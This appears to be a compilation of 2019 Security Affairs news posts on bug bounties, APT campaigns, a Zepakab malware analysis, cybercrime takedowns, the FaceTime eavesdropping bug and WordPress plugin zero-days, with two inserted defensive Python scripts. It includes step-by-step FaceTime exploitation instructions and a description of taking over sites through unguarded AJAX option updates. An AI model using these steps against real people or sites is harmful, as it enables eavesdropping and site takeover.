“Only interact with your own accounts or provided test accounts for security research purposes.” continues the announcement.

Under the program rules, researchers must:

  • add the following header to all HTTP requests: Skyscanner-Security: Bugcrowd
  • use your username@bugcrowdninja.com email address for accounts
  • not access or modify our, or our travellers’ data, without explicit prior permission of the owner. Only interact with your own accounts or provided test accounts for security research purposes
  • contact us immediately if you inadvertently encounter traveller data. Do not view, alter, save, store, transfer, or otherwise access the data, and immediately purge any local information upon reporting the vulnerability to Skyscanner
  • perform testing and research only within the areas that are in scope
  • follow the Bugcrowd Coordinated Disclosure rules

Researchers risk a 10% penalty if their submission is valid but the rules haven’t been followed, Skyscanner said.

Skyscanner will pay rewards of up to $1,500 per vulnerability, rising to $2,000 in the focus areas, for issues such as security misconfigurations, server-side injection, broken authentication, sensitive data exposure and cryptography-related bugs.

Priority   Reward   Reward (focus area)
P1         $1,500   $2,000
P2         $900     $1,200
P3         $300     $400
P4         $100     $150

“It is important to note that in some cases a vulnerability priority will be modified due to its likelihood or impact.” Skyscanner added. “In any instance where an issue is downgraded, a full, detailed explanation will be provided to the researcher – along with the opportunity to appeal, and make a case for a higher priority,”

Pierluigi Paganini

(SecurityAffairs – Skyscanner, bug bounty)

The post Skyscanner launches a public bug bounty program appeared first on Security Affairs.

Facebook paid teens $20 to install a Research App that spies on them

Facebook is paying teens $20 a month to use its VPN app, called Facebook Research, which monitors their activity on their mobile devices.

2018 was a terrible year for Facebook, which was in the middle of the Cambridge Analytica privacy scandal. The social network giant was involved in other cases; for example, it was forced to remove its Onavo VPN app from Apple’s App Store because it was caught collecting user data through Onavo Protect, the Virtual Private Network (VPN) service it acquired in 2013.

According to a report presented by Privacy International in December at the 35C3 hacking conference held in Germany, the list of Android apps that send tracking and personal information back to Facebook includes dozens of apps, among them Kayak, Yelp and Shazam.

Now, according to a report published by TechCrunch, Facebook is paying teenagers around $20 a month to use its VPN app, which monitors their activity on their mobile devices.


Facebook is accused of using the VPN app to track users’ activities across multiple different apps, especially the use of third-party apps.

“Desperate for data on its competitors, Facebook has been secretly paying people to install a ‘Facebook Research’ VPN that lets the company suck in all of a user’s phone and web activity, similar to Facebook’s Onavo Protect app that Apple banned in June and that was removed in August.” reads the report published by TechCrunch.

“Facebook sidesteps the App Store and rewards teenagers and adults to download the Research app and give it root access to network traffic in what may be a violation of Apple policy so the social network can decrypt and analyze their phone activity, a TechCrunch investigation confirms.”

Techcrunch reported that some documentation refers to the Facebook Research program as “Project Atlas,” it added that Facebook confirmed the existence of the app.

The news is disconcerting: despite the privacy cases in which Facebook was involved, the company has been paying users aged 13 to 35 as much as $20 per month plus referral fees for installing Facebook Research on their iOS or Android devices. The company described the ‘Facebook Research’ app as a “paid social media research study.”

Facebook is distributing the app via third-party beta testing services Applause, BetaBound, and uTest that were also running ads on Instagram and Snapchat recruiting participants to install Facebook Research.

Let’s take a closer look at the Facebook Research app. The app requires users to install a custom enterprise root certificate, allowing the social media giant to collect private messages in social media apps, chats from instant messaging apps, emails, web searches, web browsing activity, and even ongoing location information by tapping into the feeds of any location-tracking apps installed on the users’ devices.

Experts pointed out that in some cases the Facebook Research app also asked users to take screenshots of their Amazon order history and send them back to Facebook.

Reading the Applause site it is possible to have more info on how the company could use the data:

“By installing the software, you’re giving our client permission to collect data from your phone that will help them understand how you browse the internet, and how you use the features in the apps you’ve installed . . . This means you’re letting our client collect information such as which apps are on your phone, how and when you use them, data about your activities and content within those apps, as well as how other people interact with you or your content within those apps. You are also letting our client collect information about your internet browsing activity (including the websites you visit and data that is exchanged between your device and those websites) and your use of other online services. There are some instances when our client will collect this information even where the app uses encryption, or from within secure browser sessions.” the terms read.

Facebook confirmed that the app was developed for research purposes, in particular to study how people use their mobile devices.

“like many companies, we invite people to participate in research that helps us identify things we can be doing better.” explained Facebook.

“helping Facebook understand how people use their mobile devices, we have provided extensive information about the type of data we collect and how they can participate. We do not share this information with others, and people can stop participating at any time.”

Facebook’s spokesperson claimed that the app doesn’t violate Apple’s Enterprise Certificate program. TechCrunch points out that since Apple requires developers to use this certificate system only for distributing internal corporate apps to their own employees, “recruiting testers and paying them a monthly fee appears to violate the spirit of that rule.”

After the disclosure of the report, Facebook announced that it is planning to shut down the iOS version of the Facebook Research app.

Pierluigi Paganini

(SecurityAffairs – Facebook Research app, Privacy)

The post Facebook paid teens $20 to install a Research App that spies on them appeared first on Security Affairs.



Reading the ENISA Threat Landscape Report 2018

According to the ENISA Threat Landscape Report 2018, 2018 has brought significant changes in the techniques, tactics, and procedures associated with cybercrime organizations and nation-state actors.

I’m proud to present to you the ENISA Threat Landscape Report 2018, the annual report published by the ENISA ETL group that provides insights on the evolution of cyber threats in 2018.

ENISA Threat Landscape Report 2018

2018 was characterized by significant changes in the cyber threat landscape, especially in the TTPs associated with threat agent groups. Financially motivated attackers focused their efforts on developing and spreading crypto-miners; this threat appeared for the first time in the top 15 threats included in the report.

Nation-state hacking reduced the use of complex malware and appears to be shifting towards low-profile social engineering attacks.

“Recent political activities have underlined the emergence of various, quite novel developments in the perceived role of cyberspace for society and national security.” reads the ENISA Threat Landscape Report 2018. “Cyber-diplomacy, cyber-defence and cyberwar regulation have dominated the headlines. These developments, when transposed to actions, are expected to bring new requirements and new use cases for cyberthreat intelligence.”

ENISA experts believe threat actors will adapt their activities to the changes introduced to prevent the above interference.

The main trends that emerged in the 2018 cyberthreat landscape are:

  • Mail and phishing messages have become the primary malware infection vector.
  • Exploit Kits have lost their importance in the cyberthreat landscape.
  • Cryptominers have become an important monetization vector for cyber-criminals.
  • State-sponsored agents increasingly target banks by using attack-vectors utilised in cyber-crime.
  • Skill and capability building are the main focus of defenders. Public organisations struggle with staff retention due to strong competition with industry in attracting cybersecurity talents.

The report highlights the importance of cyber threat intelligence in responding to increasingly automated attacks that leverage automated tools and skills. Unfortunately, low-capability organisations and end-users have no access to cyberthreat intelligence solutions, which exposes them to a severe risk of compromise.

Another element of concern is the diffusion of IoT devices that are poorly protected.

“The need for generic IoT protection architectures/good practices will remain pressing.” continues the report.

All the above trends are detailed in the ENISA Threat Landscape 2018 (ETL 2018), a must-read for cyber security experts and enthusiasts.

Let me close with the Top Threats 2018; for each threat the report includes detailed information on trends and observed evolution.

Enjoy it!


Pierluigi Paganini

(SecurityAffairs –  cybersecurity, ENISA Threat Landscape Report 2018)

The post Reading the ENISA Threat Landscape Report 2018 appeared first on Security Affairs.

Iran-Linked APT39 group use off-the-shelf tools to steal data

An Iran-linked cyber-espionage group tracked as APT39 is carrying out a widespread campaign using a broad range of custom and off-the-shelf tools.

The APT39 cyberespionage group is carrying out a widespread campaign using a broad range of custom and off-the-shelf tools. The group has been active at least since November 2014; its operations overlap with those attributed to the Chafer and OilRig groups, bringing together TTPs used by both actors.

APT39 cyber spies focused their operations on the Middle East; other entities targeted by the group are located in the U.S. and South Korea. Most of the victims belong to the telecommunications and travel industries, and the cyber spies also targeted the high-tech industry and government.

“APT39 primarily leverages the SEAWEED and CACHEMONEY backdoors along with a specific variant of the POWBAT backdoor. While APT39’s targeting scope is global, its activities are concentrated in the Middle East.” reads the report published by FireEye.

“APT39 has prioritized the telecommunications sector, with additional targeting of the travel industry and IT firms that support it and the high-tech industry.”

The operations conducted by the APT39 group aim to collect geopolitical data and to monitor targets of interest.

Experts observed an overlap between the malware distribution techniques and command and control infrastructure used by APT39 and those observed in campaigns associated with other Iran-linked APT groups.

Researchers at FireEye pointed out that the POWBAT backdoor used by the APT39 group is different from the one used by APT34, but they don’t exclude a close collaboration between the two crews.

“While APT39 and APT34 share some similarities, including malware distribution methods, POWBAT backdoor use, infrastructure nomenclature, and targeting overlaps, we consider APT39 to be distinct from APT34 given its use of a different POWBAT variant. It is possible that these groups work together or share resources at some level.” continues the report.

Initial compromise leverages spear-phishing messages carrying malicious attachments or URLs that lead to a POWBAT infection. Furthermore, the cyberspies also target vulnerable web servers of organizations to install web shells such as ANTAK and ASPXSPY; the attackers also used stolen legitimate credentials to compromise externally facing Outlook Web Access (OWA) resources.

In the post-infection phase, the threat actors leverage custom backdoors such as SEAWEED, CACHEMONEY, and a unique variant of POWBAT that is used by attackers to gain a foothold in a target environment.

Attackers use tools like Mimikatz and Ncrack, along with legitimate tools such as Windows Credential Editor and ProcDump and the port scanner BLUETORCH.

Once inside the target environment, the attackers use tools such as Remote Desktop Protocol (RDP), Secure Shell (SSH), PsExec, RemCom, and xCmdSvc for lateral movement. Other custom tools used by the threat actors are REDTRIP, PINKTRIP, and BLUETRIP, which allow them to create SOCKS5 proxies between infected hosts.

APT39 usually compresses data with WinRAR or 7-Zip before exfiltrating it.

“APT39’s targeting not only represents a threat to known targeted industries, but it extends to these organizations’ clientele, which includes a wide variety of sectors and individuals on a global scale.” FireEye concludes. 

“APT39’s activity showcases Iran’s potential global operational reach and how it uses cyber operations as a low-cost and effective tool to facilitate the collection of key data on perceived national security threats and gain advantages against regional and global rivals.”

Pierluigi Paganini

(SecurityAffairs – IRAN, APT39)

The post Iran-Linked APT39 group use off-the-shelf tools to steal data appeared first on Security Affairs.

Sofacy’s Zepakab Downloader Spotted In-The-Wild

In the last weeks, the Cybaze-Yoroi ZLAB investigated a new APT28 campaign leveraging the Zepakab Downloader.

In the last weeks, the Cybaze-Yoroi ZLAB investigated a new APT28 campaign discovered in January 2019.

The sample has been initially identified by an Italian independent security researcher, who warned the InfoSec community and shared the binary for further analysis.

Cybaze-Yoroi ZLab researchers analyzed this sample to extract indicators and investigate its presence in the Italian landscape.

Technical Analysis

The attack vector is still not clear; APT28 typically uses decoy Office documents armed with VBA macros. In any case, the analyzed sample pretends to be a Microsoft component called “ServiceTray”.

Sha256: e6e93c7744d20e2cac2c2b257868686c861d43c6cf3de146b8812778c8283f7d
Threat: Zepakab/Zebrocy Downloader
ssdeep: 12288:QYV6MorX7qzuC3QHO9FQVHPF51jgcSj2EtPo/V7I6R+Lqaw8i6hG0:vBXu9HGaVHh4Po/VU6RkqaQ6F

At first glance the executable shows it is packed using UPX v3.0 compressor, a widely known tool commonly used to minimize the PE file size.

Figure 1. Info about malicious PE.

Interestingly, the resource section of the executable shows a typical binary pattern of an AutoIt v3 compiled script: the “AUT3!” signature.

Figure 2. Hexadecimal view reporting the AutoIt v3 header.

After decompiling and extracting the script, we noticed it looks simpler than expected: no obfuscation or anti-analysis tricks were found.
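The two static traits used above to identify the sample, UPX section names in the PE section table and the AutoIt compiled-script marker in the file body, can be turned into a small triage check. The following Python is an added example and not part of the Cybaze-Yoroi analysis; the marker strings and the minimal PE image it builds for testing are assumptions of this example.

```python
"""Triage check for UPX-packed, AutoIt-compiled PE files (added example)."""
import struct
from dataclasses import dataclass, field
from typing import List, Optional

# UPX renames the sections it creates; the names are a cheap packer hint.
UPX_SECTION_NAMES = {b"UPX0", b"UPX1", b"UPX2"}
# Marker of an AutoIt v3 compiled script. The writeup calls it "AUT3!";
# "AU3!EA06" is the string commonly seen in real binaries. Both are assumptions
# of this example and can be extended as needed.
AUTOIT_MARKERS = (b"AU3!EA06", b"AUT3!")


@dataclass
class TriageResult:
    is_pe: bool = False
    sections: List[bytes] = field(default_factory=list)
    upx_packed: bool = False
    autoit_marker_offset: int = -1  # -1 when no marker was found

    @property
    def suspicious(self) -> bool:
        """Both traits together match the pattern described in the analysis."""
        return self.upx_packed and self.autoit_marker_offset >= 0


def parse_section_names(data: bytes) -> Optional[List[bytes]]:
    """Return the section names from the PE section table, or None if not a PE."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        return None
    num_sections = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    table = e_lfanew + 24 + opt_size  # section table follows the optional header
    names = []
    for i in range(num_sections):
        off = table + i * 40  # IMAGE_SECTION_HEADER is 40 bytes
        if off + 40 > len(data):
            break
        names.append(data[off:off + 8].rstrip(b"\x00"))
    return names


def triage(data: bytes) -> TriageResult:
    """Check a PE image for UPX section names and an AutoIt script marker."""
    names = parse_section_names(data)
    res = TriageResult(is_pe=names is not None, sections=names or [])
    res.upx_packed = any(n in UPX_SECTION_NAMES for n in res.sections)
    # The marker lives in the resource section; a packer may compress it, so a
    # miss here is not a clean bill of health, but a hit is a strong signal.
    for marker in AUTOIT_MARKERS:
        off = data.find(marker)
        if off >= 0:
            res.autoit_marker_offset = off
            break
    return res


def build_sample_pe(section_names: List[bytes], payload: bytes = b"") -> bytes:
    """Construct a minimal, non-executable PE image (constructed test data)."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\x00" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    # COFF header: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader (0 here), Characteristics.
    coff = b"PE\x00\x00" + struct.pack("<HHIIIHH", 0x14C, len(section_names), 0, 0, 0, 0, 0x102)
    table = b"".join(n.ljust(8, b"\x00") + b"\x00" * 32 for n in section_names)
    return dos + coff + table + payload


if __name__ == "__main__":
    sample = build_sample_pe([b"UPX0", b"UPX1", b".rsrc"], b"\x00" * 16 + b"AU3!EA06")
    print(triage(sample))
```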

The usage of the AutoIt language is an emerging characteristic of recent Zepakab downloaders, as also stated by Vitali Kremez, an independent security researcher who compared this sample with the older Zepakab implant version: the behavior and the script structure are very similar, but obviously the new sample uses different command-and-control servers and artifact names.

Figure 3. Part of malicious decompiled AutoIt script.

After statically setting some variables, such as the C2 URL and the payload path, the script invokes the “argv” function, which calculates a 32-character random ID.

Figure 4. Function to craft a 32-character random ID.

Then it runs the “main” routine, the core of Zepakab: here the malware implements reconnaissance functionality, retrieves machine information and grabs a screenshot every minute.

Figure 5. AutoIt script’s main function.

Then, all the information is encoded in Base64 and sent to the C2 through the “connect” function, using an SSL-encrypted HTTP channel. Just before sending its message, the malware adds random padding characters, probably to prevent automatic decoding of the message; the final request looks like this:

Figure 6. POST request sent to the C2.

The machine information sent to the C2 is gathered within the “info” function, invoking the “_computergetoss” routine. This last code snippet is likely borrowed from a publicly available AutoIt library script called “CompInfo.au3”: an AutoIt interface to access the Windows Management Instrumentation framework’s data.

Figure 7. Function to retrieve information about victim’s machine.

The code analysis also identified another re-used snippet of script: the AutoIt WinHttp wrapper was included in the malicious sample to enable network communication through the system proxy.

Figure 8. Blog post reporting the Base64 script, shared by a forum user.

Once the communication channel has been established, the command and control server analyzes the victim check-in information and, if the compromised machine is likely a target, sends back the final payload.

The payload will eventually be saved to “C:\ProgramData\Windows\Microsoft\Settings\srhost.exe” and executed inside the “crocodile” function.

Figure 9. The “crocodile” function, used to launch the final payload.

Once the final payload is correctly launched ($cr != 0), the function sets the $call variable to False and the main loop of the script terminates.

Unfortunately, the C2 destination was down at the time of writing, so it was impossible to retrieve the final payload and proceed with an in-depth analysis.

Conclusion

Despite its harmful capabilities, the AutoIt Zepakab malware is quite simple and surprisingly does not use any anti-analysis tricks. The Sofacy group borrowed code from publicly available scripts to ease the development of this new weapon in its arsenal and to keep a low profile in terms of TTPs, building a cheap and effective info-stealer able to bypass traditional antivirus almost effortlessly.

CERT-Yoroi assessed that no organization in its constituency has been impacted by this threat.

Further details, including Yara rules and Indicators of compromise (IoCs), are reported in the analysis published on the Yoroi blog.

Pierluigi Paganini

(SecurityAffairs – Zepakab, APT28)


The post Sofacy’s Zepakab Downloader Spotted In-The-Wild appeared first on Security Affairs.

Netanyahu accuses Iran of cyber attacks carried out daily

Israeli Prime Minister Benjamin Netanyahu accuses Iran of launching cyber-attacks on his country on a daily basis.

Prime Minister Benjamin Netanyahu revealed that Iran launched cyber-attacks on Israel on a daily basis, but its experts are able to block them.

“Iran attacks Israel on a daily basis,” Netanyahu declared during a cyber conference in Tel Aviv.

“We monitor these attacks, we see these attacks and we foil these attacks all the time.”

The Israeli Prime Minister added that today countries need to combine an effective cyber defence with a prolific and advanced cyber security industry.

“Any country can be attacked today with cyber-attacks and every country needs the combination of a national cyber defence effort and a robust cyber security industry,” Netanyahu said.

“I think Israel has that… in ways that are in many ways unmatched,” he said.

A few days ago, Israel launched a massive attack on Iranian targets in Syria, after Iranian fighters fired a surface-to-surface rocket at the northern Golan Heights. The Israeli air force hit an airport in Damascus and killed 12 pro-regime fighters.

In recent months, the operations of Iran-linked APT groups in the Middle East have increased as never before.

Early January, security experts at FireEye uncovered a DNS hijacking campaign that was targeting government agencies, ISPs and other telecommunications providers, Internet infrastructure entities, and sensitive commercial organizations in the Middle East, North Africa, North America and Europe. According to the experts, the campaign is carried out, with “moderate confidence,” by APT groups linked to the Iranian Government.

In 2018, multiple reports published by Palo Alto Networks described TTPs adopted by Iran-linked APT group OilRig (aka APT34) that targeted entities in the Middle East.

Pierluigi Paganini

(SecurityAffairs – Israel, Netanyahu)

The post Netanyahu accuses Iran of cyber attacks carried out daily appeared first on Security Affairs.

Law enforcement worldwide hunting users of DDoS-for-Hire services

Europol and law enforcement agencies worldwide are investigating DDoS-for-hire services and hunting users that paid them to carry out cyber attacks.

In April 2018, an international operation conducted by the European law enforcement agencies led by the UK’s National Crime Agency (NCA) and the Dutch Police, with the help of Europol, took down the world’s biggest DDoS-for-hire service.

The operation, dubbed Power Off, shut down the biggest DDoS-for-hire service (webstresser.org) and led to the arrest of its administrators. According to the investigators, the platform was involved in over 4 million attacks.

The police arrested 6 members of the crime group behind the webstresser.org website in Scotland, Croatia, Canada, and Serbia on Tuesday.

Europol confirmed that webstresser.org had 136,000 registered users and was used to target online services from banks, government institutions, police forces and the gaming world.

Now law enforcement agencies are investigating the customers that paid for the DDoS-for-hire service.

Europol has announced that the British NCA is conducting several operations all over the world to identify and arrest Webstresser.org users.

“In the United Kingdom a number of webstresser.org users have recently been visited by the police, who have seized over 60 personal electronic devices from them for analysis as part of Operation Power OFF.” reads the press release published by the Europol. “UK police are also conducting a number of live operations against other DDoS criminals; over 250 users of webstresser.org and other DDoS services will soon face action for the damage they have caused.”

The Europol gained access to the accounts of over 151,000 registered Webstresser users when it dismantled the service, the agency also obtained a huge trove of information about them.

According to Europol, over 250 users of DDoS-for-hire services, including webstresser.org, will soon face potential prosecution.

“To this effect, the FBI seized last December 15 other DDoS-for-hire websites, including the relatively well known Downthem and Quantum Stresser. Similarly, the Romanian police has taken measures against the administrators of 2 smaller-scale DDoS platforms and has seized digital evidence, including information about the users.” continues the press release.

“Size does not matter – all levels of users are under the radar of law enforcement, be it a gamer booting out the competition out of a game, or a high-level hacker carrying out DDoS attacks against commercial targets for financial gain.”

UK police have already raided the homes of several webstresser.org users; in the Netherlands, authorities are working to unmask Dutch users of the service, and a Dutch user of webstresser.org has already received an alternative sanction.

Europol revealed that other countries, including the United States, Belgium, Croatia, France, Germany, Greece, Denmark, Romania, Estonia, Hungary, Ireland, Switzerland, Norway, Lithuania, Portugal, Slovenia, Sweden, Australia, Colombia, Serbia, have also joined the fight against DDoS attacks.

“Emboldened by a perceived anonymity, many young IT enthusiasts get involved in this seemingly low-level crime, unaware of the consequences that such online activities can carry. Cybercrime isn’t a victimless crime and it is taken extremely seriously by law enforcement. The side effects a criminal investigation could have on the lives of these teenagers can be serious, going as far as a prison sentence in some countries.” concludes the Europol.

“Skills in coding, gaming, computer programming, cyber security or anything IT-related are in high demand and there are many careers and opportunities available to use these wisely.”

Pierluigi Paganini

(SecurityAffairs – DDoS-for-hire service, hacking)

The post Law enforcement worldwide hunting users of DDoS-for-Hire services appeared first on Security Affairs.

US DoJ charges Huawei sanctions violations and in technology espionage

The US Justice Department charges the Chinese telecommunications giant Huawei with technology theft and violation of sanctions.

The US Justice Department charges the Chinese telecommunications giant Huawei in two cases, including the one that led to the arrest of a top executive in Canada on a US warrant.

According to the US DoJ, the charges are the response to persistent actions conducted by the Chinese company to exploit American organizations.

The US DoJ confirmed 13 charges against Huawei chief financial officer Meng Wanzhou and three other affiliates, who are accused of violating US sanctions on Iran.

Wanzhou is the daughter of Huawei founder Ren Zhengfei; she is currently out on bail in Canada and is expected to fight extradition to the United States. The arrest has triggered a diplomatic crisis between Canada, the US, and China.

Another 10 charges were filed against two Huawei affiliates that are accused of the theft of robot technology from T-Mobile.

“Both sets of charges expose Huawei’s brazen and persistent actions to exploit American companies and financial institutions, and to threaten the free and fair global marketplace,” explained FBI Director Christopher Wray.

“Acting US Attorney General Matthew Whitaker said the extradition request would be sent by a January 30 deadline. A hearing is set for February 6.” reported the AFP press.

According to Whitaker, the indictment doesn’t refer to the involvement of the Chinese government in the case, but China must hold Chinese firms like Huawei accountable for complying with the law.

“As I told Chinese officials in August, China must hold its citizens and Chinese companies accountable for complying with the law,” said Whitaker.

Pierluigi Paganini

(SecurityAffairs – China, cyber espionage)

The post US DoJ charges Huawei sanctions violations and in technology espionage appeared first on Security Affairs.

Security Affairs: Disable FaceTime, a bug lets you hear a person’s audio before he answers

A major vulnerability in Apple FaceTime lets you hear the audio of the person you are calling … before they pick up the call.

iPhone, iPad, or Mac users may want to disable FaceTime to avoid being spied on through their devices.

Experts warn that it is possible to call someone via FaceTime and listen via the microphone of their devices before they accept or reject the call.

“There’s a major bug in FaceTime right now that lets you connect to someone and hear their audio without the person even accepting the call.” reads a thread published on MacRumors.  

“This bug is making the rounds on social media, and as 9to5Mac points out, there are major privacy concerns involved. You can force a FaceTime call with someone and hear what they’re saying, perhaps even without their knowledge. 

We tested the bug at MacRumors and were able to initiate a FaceTime call with each other where we could hear the person on the other end without ever having pressed the button to accept the call.”

The flaw affects iOS versions 12.1 and 12.2, and macOS Mojave.

The procedure to exploit this vulnerability is: 

  • Initiate a FaceTime call with someone. 
  • While the call is ringing, swipe up from the bottom of the display. 
  • Tap on the “Add Person” button. 
  • Add your own phone number when it asks for the number of the person to add. 

When a connection is started, the screen of the caller appears like a standard Group FaceTime call sans video, while on the other person’s screen, it still looks like the call hasn’t been accepted.

The experts pointed out that if the callee presses the power button, the front-facing camera feed is also secretly shown to the caller.

Below a video showing the issue:

“The damage potential here is real. You can listen in to soundbites of any iPhone user’s ongoing conversation without them ever knowing that you could hear them. Until Apple fixes the bug, it’s not clear how to defend yourself against this attack either aside from disabling FaceTime altogether,” reported 9to5mac.com.

“As it stands, if your phone is ringing with an incoming FaceTime request, the person on the other end could be listening in.”

Apple will release a security patch to address the vulnerability later this week.

If you want to disable FaceTime, follow these instructions.

“Apple says the issue will be addressed in a software update “later this week”. (Update: Apple has taken Group FaceTime offline in an attempt to address the issue in the interim).” continues 9to5mac.com.

Pierluigi Paganini

(SecurityAffairs – FaceTime, hacking)

The post Disable FaceTime, a bug lets you hear a person’s audio before he answers appeared first on Security Affairs.



Authorities shut down XDEDIC marketplace in an international operation

A joint operation conducted by law enforcement agencies in the United States and Europe allowed the seizure of the xDedic marketplace.

Law enforcement agencies in the US and Europe announced the seizure of the popular xDedic marketplace, an underground market offering for sale access to compromised systems and personally identifiable information.

“On 24 January, the U.S. Prosecutor’s Office for the Middle District of Florida, the FBI and the Internal Revenue Service (IRS) of Tampa (Florida), the Federal Computer Crime Unit (FCCU), the Federal Prosecutor’s Office and the Investigating Judge of Belgium, as well as the Ukrainian National Cyber Police and Prosecutor General’s office of Ukraine, with the support of the Bundeskriminalamt of Germany and Europol seized the xDedic Marketplace.” reads the press release published by the Europol.

The black marketplace has been active since 2014, it was first analyzed by experts at Kaspersky Lab in 2016.

At the time, the domain (xdedic[.]biz) went offline following a report from Kaspersky Lab that detailed, in its Corporate News section, the scope and method of operations of the illicit marketplace. The website quickly reappeared in the Tor network.

In 2016 the service was offering up to 70,000 hacked servers for as little as $6 USD, and with 416 registered sellers in 173 countries, the platform was operating a highly successful global business model.

The researchers confirmed that the xDedic marketplace is run by a Russian-speaking group.


Law enforcement authorities in the United States, Belgium and Ukraine, in collaboration with Europol, seized xDedic on January 24.

Buyers were able to search for access to compromised systems by multiple criteria, including price, geographic location, and operating system.

The xDedic administrators maintained servers worldwide and accepted payment in Bitcoin to protect users’ anonymity. The compromised systems belonged to a wide range of industries, including local, state, and federal government infrastructure, hospitals, emergency services, major metropolitan transit authorities, accounting and law firms, pension funds, and universities.

According to the investigators, the website facilitated more than $68 million in fraud.

Pierluigi Paganini

(SecurityAffairs – xDedic market, cybercrime)


Aztarna – the open-source scanning tool for vulnerable robots

Experts from Alias Robotics released a free, open-source tool dubbed Aztarna that could be used to find vulnerable robots.

A group of experts working at a startup focused on robot cybersecurity has released a free, open-source framework dubbed Aztarna that can be used to find vulnerable robots exposed online or inside an industrial environment.

The team works for the cybersecurity firm Alias Robotics; the Aztarna framework was designed to find vulnerable industrial routers and robots powered by ROS (Robot Operating System), SROS (Secure ROS) and other technologies.

“aztarna is an open source instrument developed by Alias Robotics, ready to be used by security researchers interested in robot footprinting. It allows to find robots powered by ROS, SROS and other robot technologies.” reads a blog post published by the experts.

Aztarna works as a classic port scanner and compares its results against a built-in database of fingerprints for industrial devices from major vendors.

The tool is able to scan the most popular industrial routers, from manufacturers including Ewon, Moxa, Westermo and Sierra Wireless, for known flaws and misconfigurations.

In a first scan the experts found close to 9,000 insecure industrial routers, 1,586 of them in Europe; the highest shares of misconfigured systems were in France (63%) and Spain (54%). The largest number of industrial routers was detected in North America, with poor security settings on 36% of them in the US and 41% in Canada.


Anyone can contribute to the project by adding more fingerprints and patterns to support new robot components.

Researchers at Alias Robotics informed the owners of the vulnerable robots about their discovery.

“Overall, we conclude that aztarna responds to the need of auditing robot security. As ROS is becoming the de facto standard in robot programming, more and more robots are being exposed everyday. The footprinting techniques on ROS are specially dangerous, because once detected and footprinted, ROS powered systems are inherently vulnerable. Existing robot security mitigations, such as SROS, are not used extensively.” concludes the research paper published by the experts.

“The present study reports mainly research robots aligned with prior art, but we have reported the footprinting of professional robots as well. We have discovered an array of internet-connected unprotected industrial routers, that could potentially host robots. There is an unresolved gap in robotics cybersecurity which would greatly benefit from releasing the first auditing tools.”

Pierluigi Paganini

(SecurityAffairs – Aztarna, hacking)


Hackers compromise WordPress sites via Zero-Day flaws in Total Donations plugin

Security experts at the security firm Wordfence discovered WordPress sites compromised via zero-day vulnerabilities in the Total Donations plugin.

The Total Donations WordPress plugin has been abandoned by its developers; for this reason, security experts recommend deleting it, after discovering multiple zero-day flaws that are being exploited by threat actors.

The news was reported by the security firm Wordfence, which observed threat actors exploiting the zero-day issues in the Total Donations WordPress plugin to gain administrative access to websites running the popular CMS.


Experts attempted to contact the development team behind the plugin, but they did not receive any reply.

“The Wordfence Threat Intelligence team recently identified multiple critical vulnerabilities in the commercial Total Donations plugin for WordPress. These vulnerabilities, present in all known versions of the plugin up to and including 2.0.5, are being exploited by malicious actors to gain administrative access to affected WordPress sites.” reads the security advisory published by Wordfence.

“It is our recommendation that site owners using Total Donations delete–not just deactivate–the vulnerable plugin as soon as possible to secure their sites,” the advisory continues.

The zero-day flaws affect all known versions of the WordPress plugin up to and including 2.0.5.

The Total Donations WordPress plugin is currently used by many non-profit and political organizations to receive donations.

The flaws are tracked as CVE-2019-6703. The experts discovered that Total Donations registers a total of 88 unique AJAX actions in WordPress, which unauthenticated users can reach by querying the standard /wp-admin/admin-ajax.php endpoint.

“We have determined that 49 of these 88 actions can be exploited by a malicious actor to access sensitive data, make unauthorized changes to a site’s content and configuration, or take over a vulnerable site entirely. ” continues the analysis.

The flaws could be exploited by an unauthenticated attacker who sends requests to the AJAX endpoint calling a specific action that updates arbitrary WordPress option values, and takes over the website this way: for example, by enabling new user registration and setting the default role for new users to Administrator.
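As an added example (not Wordfence’s or the plugin’s code), the following Python script statically audits a plugin’s PHP source for the bug class described here: AJAX handlers registered for unauthenticated callers (`wp_ajax_nopriv_*`) that reach privileged WordPress APIs such as `update_option` without a capability or nonce check. The PHP it scans is constructed for the example.

```python
"""Static audit for the bug class behind CVE-2019-6703: AJAX handlers exposed to
unauthenticated callers (wp_ajax_nopriv_*) that call privileged WordPress APIs
without a capability or nonce check.

Added example, not Wordfence's or the plugin's code; the PHP below is constructed."""
import re

# add_action('wp_ajax_<action>', 'callback') / add_action('wp_ajax_nopriv_<action>', 'callback')
REGISTER_RE = re.compile(
    r"add_action\(\s*['\"]wp_ajax_(?P<nopriv>nopriv_)?(?P<action>[\w-]+)['\"]\s*,\s*['\"](?P<cb>\w+)['\"]"
)
# WordPress calls that change site state (the post describes update_option abuse)
PRIVILEGED_RE = re.compile(
    r"\b(update_option|delete_option|wp_insert_user|wp_update_user|wp_delete_post)\s*\("
)
# Checks that should precede any state change in an AJAX handler
GUARD_RE = re.compile(r"\b(current_user_can|check_ajax_referer|wp_verify_nonce)\s*\(")


def function_body(src, name):
    """Return the body of PHP function `name` by brace matching, or None if undefined.
    Braces inside strings/comments are not special-cased; good enough for an audit pass."""
    m = re.search(r"function\s+" + re.escape(name) + r"\s*\([^)]*\)\s*\{", src)
    if not m:
        return None
    depth, i = 1, m.end()
    while i < len(src) and depth:
        depth += {"{": 1, "}": -1}.get(src[i], 0)
        i += 1
    return src[m.end():i - 1]


def audit(src):
    """Return (action, callback, severity, reason) per risky registration:
    high   = unauthenticated callers reach a privileged call with no guard
    medium = any logged-in user (e.g. a subscriber) reaches it with no guard
    review = unauthenticated handler with no guard and no known privileged call"""
    findings = []
    for m in REGISTER_RE.finditer(src):
        body = function_body(src, m["cb"])
        if body is None:
            continue
        unauth = m["nopriv"] is not None
        guarded = GUARD_RE.search(body) is not None
        privileged = sorted(set(PRIVILEGED_RE.findall(body)))
        if privileged and not guarded:
            sev = "high" if unauth else "medium"
            findings.append((m["action"], m["cb"], sev,
                             "calls " + ", ".join(privileged) + " without capability/nonce check"))
        elif unauth and not guarded:
            findings.append((m["action"], m["cb"], "review",
                             "unauthenticated handler without any guard"))
    return findings


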